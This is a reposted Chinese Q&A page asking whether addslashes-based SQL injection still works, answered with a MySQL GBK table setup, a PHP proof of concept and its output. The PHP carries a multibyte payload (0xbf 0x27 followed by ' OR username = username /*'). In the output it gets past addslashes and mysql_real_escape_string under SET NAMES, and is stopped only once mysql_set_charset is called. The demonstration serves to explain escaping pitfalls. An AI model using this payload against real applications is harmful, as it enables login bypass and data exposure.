投稿
  1. 首页
  2. 随笔

php addslashes sql注入仍然有效吗?

吉贝尔蒂 2022-11-15 随笔 阅读 226

php addslashes sql注入仍然有效吗?,第1张

php addslashes sql注入仍然有效吗?

看来对我有用。

MySQL的:

mysql> select version();+---------------------+| version()|+---------------------+| 5.0.45-community-nt |+---------------------+1 row in set (0.00 sec)mysql> CREATE TABLE users (    ->     username VARCHAr(32) CHARACTER SET GBK,    ->     password VARCHAr(32) CHARACTER SET GBK,    ->     PRIMARY KEY (username)    -> );Query OK, 0 rows affected (0.08 sec)mysql> insert into users SET username='ewrfg', password='wer44';Query OK, 1 row affected (0.02 sec)mysql> insert into users SET username='ewrfg2', password='wer443';Query OK, 1 row affected (0.03 sec)mysql> insert into users SET username='ewrfg4', password='wer4434';Query OK, 1 row affected (0.00 sec)

PHP:

<pre><?phpecho "PHP version: ".PHP_VERSION."n";mysql_connect();mysql_select_db("test");mysql_query("SET NAMES GBK");$_POST['username'] = chr(0xbf).chr(0x27).' OR username = username /*';$_POST['password'] = 'guess';$username = addslashes($_POST['username']);$password = addslashes($_POST['password']);$sql = "SELECT * FROM  users WHERe  username = '$username' AND password = '$password'";$result = mysql_query($sql) or trigger_error(mysql_error().$sql);var_dump($username);var_dump(mysql_num_rows($result));var_dump(mysql_client_encoding());$username = mysql_real_escape_string($_POST['username']);$password = mysql_real_escape_string($_POST['password']);$sql = "SELECt * FROM  users WHERe  username = '$username' AND password = '$password'";$result = mysql_query($sql) or trigger_error(mysql_error().$sql);var_dump($username);var_dump(mysql_num_rows($result));var_dump(mysql_client_encoding());mysql_set_charset("GBK");$username = mysql_real_escape_string($_POST['username']);$password = mysql_real_escape_string($_POST['password']);$sql = "SELECt * FROM  users WHERe  username = '$username' AND password = '$password'";$result = mysql_query($sql) or trigger_error(mysql_error().$sql);var_dump($username);var_dump(mysql_num_rows($result));var_dump(mysql_client_encoding());

结果:

PHP version: 5.3.3string(29) "ї' OR username = username /*"int(3)string(6) "latin1"string(29) "ї' OR username = username /*"int(3)string(6) "latin1"string(30) "ї' OR username = username /*"int(0)string(3) "gbk"

结论:

对于那些高喊“您应该使用mres而不是加号!”的人来说,第二个结果将是最令人惊讶的。



欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/zaji/5018412.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
吉贝尔蒂 吉贝尔蒂 一级用户组
0 0
上一篇 2022-11-15
下一篇 2022-11-15

发表评论

登录后才能评论

评论列表(0条)

保存